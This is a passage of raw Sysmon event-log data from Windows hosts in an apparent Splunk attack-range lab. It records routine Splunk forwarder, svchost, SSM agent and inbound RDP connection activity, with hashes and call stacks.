09:02:45.732{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048253Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:45.732{5EBD8912-7F2D-614D-0500-00000000FC01}408424C:\Windows\system32\csrss.exe{5EBD8912-88B5-6151-F579-00000000FC01}6072C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048252Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:45.732{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-88B5-6151-F579-00000000FC01}6072C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048251Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:45.719{5EBD8912-88B5-6151-F579-00000000FC01}6072C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001048250Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:45.584{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=74D65872640752695236760C21E45185,SHA256=00E42410A89C1DF4179D325733A367E47A73CD2DA74C133705D985809B3EA770,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048249Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:45.583{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=153C20CAFFC0CECFC5EE4955114A2625,SHA256=509AED921EAD0E75BBFABD606F1BEBE22825ED0CB111DB840A30738C14860307,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048248Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:45.132{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-88B5-6151-F479-00000000FC01}6968C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048247Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:45.132{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048246Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:45.132{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048245Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:45.132{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048244Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:45.132{5EBD8912-7F2F-614D-0C00-00000000FC01}8281408C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048243Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:45.132{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-88B5-6151-F479-00000000FC01}6968C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048242Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:45.132{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-88B5-6151-F479-00000000FC01}6968C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048241Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:45.117{5EBD8912-88B5-6151-F479-00000000FC01}6968C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001048240Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:45.063{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD159C6C1F3C1D033DA0DB926144C522,SHA256=19EC15C05AD3F0E738AF9A25E3D180F4966D96851C3E47E75BAF5D910DB0A882,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976865Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:45.644{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A6B0D64E55CABC845D4627B9DF26355A,SHA256=C087E16A636D4BCC16D5B6163353946DBA13FBAE0385AAAF8A154585E579CED5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976864Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:42.702{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-34510-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976870Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:46.847{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=270AB08BB2704E934C17DAEADB69B2E6,SHA256=D7304EE5FB7F8488A980BD9C2AFD80B5DABF5AA9E65F7A040410E8F62A86D47B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048262Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:46.716{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=74D65872640752695236760C21E45185,SHA256=00E42410A89C1DF4179D325733A367E47A73CD2DA74C133705D985809B3EA770,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048261Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:43.871{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49239-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001048260Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:43.809{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-53709-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001048259Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:46.085{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA073ACEB0D76342FD40C44EBDE6FA17,SHA256=A854011B292C3A076C8D0CA70E5D9973C1D27028C48DA1A867CB08DFFF1879EF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976869Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:43.867{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59274-false10.0.1.12-8000- 354300x8000000000000000976868Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:43.384{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-54171-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000976867Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:42.957{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-54734-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976872Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:47.863{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FB2F286FD9EF2741B47C4B6A979BD9C,SHA256=091C193BDAA92E3E04688C216EBA3839F9455BF4C01462EA9E7F0C45E0294B8C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048264Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:45.166{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-54687-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001048263Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:47.116{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A268BD111BF4EE740CB83195EEB96C13,SHA256=94557DF9F458C98C64A3B77E76F2982B00D4B06399B6A5498A84AF6D0049F9DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976871Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:47.691{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AF9B2CA5744CC8763313CE11EB55C404,SHA256=BBB8278B0675C904FC791F2A68D6B57FE4280B8BE09A59D0339E819E50FEB493,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976873Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:48.863{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=458A253D5399A29F117A5CD1EF13ED2A,SHA256=6E9C572911BA3D54E4C05FD84A9CECC13493BA531FFD9C21674FA5F8118DFC94,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048265Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:48.164{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6BE5050928C5D29D4A74C62846F6FD9,SHA256=61C021A279AD710A74FDF034525781460674E8375BFAFA8B7A6CDDCE1EA91A83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976875Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:49.930{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\respondent-20210924073259-4299MD5=C03F5A35DCD33CC76F546E3EA7D3F3DF,SHA256=27CB325E5A2A8D6C4E4022C2FAED9138BDF4BFE7B38BDA6EB79267B7EDAE26D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976874Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:49.865{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56E97404FFF5AB837A824C671816607C,SHA256=813FEDBD1C9E0BD2074735DE046D6C7B443B6C29A6FE42796961761678A2FC63,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048266Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:49.164{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41426D6B4E4A326A09CA1E23224D081F,SHA256=F00E0DB15A80D6C1747825E8A963232E9E203C00225720127322EE72B11B4685,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976878Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:50.929{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\surveyor-20210924073257-4300MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976877Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:47.605{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-4468-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976876Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:50.865{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C262EC8714ADD8DBB1F5DADDF5C228C,SHA256=3B502E4EF03E60C7DFF3BDB722A527C2319F9A2C80C2E6FAA23770A7FC7EA8C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048267Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:50.200{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C946C05A1AF9B765BD3147B033C6F19,SHA256=72FE49354D001AE31572896F5315AD99265806727FEA760D8C2975B3817DB309,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976879Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:51.866{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45D5BED405005E006EACB50456D079C8,SHA256=9E238663C7A6A34F00FFFE3449C901B1380E6287150E0F1326CD9243FE0BF437,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048269Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:49.808{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49240-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001048268Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:51.215{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBB963D9E4EC6AB8F92928E7C8902CE8,SHA256=0698CD0D39D8DCA4D21E7CEEBBF7E60C2733D978EBFC19EB63EADCD0E944C257,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976882Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:49.851{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59275-false10.0.1.12-8000- 23542300x8000000000000000976881Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:52.881{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E068F99F854348D72F75EB544C956A20,SHA256=94C53074D4903BC1420792707C827E761E72ECC8DAFA41A501BA714B18CA175E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048270Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:02:52.261{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D7D99BFCCB42E08A237B6985CAB38BD,SHA256=705063C0AD9BD76F0225E8661A25057EA63779452937EE8F17E4094261176CDC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976880Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:02:52.678{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 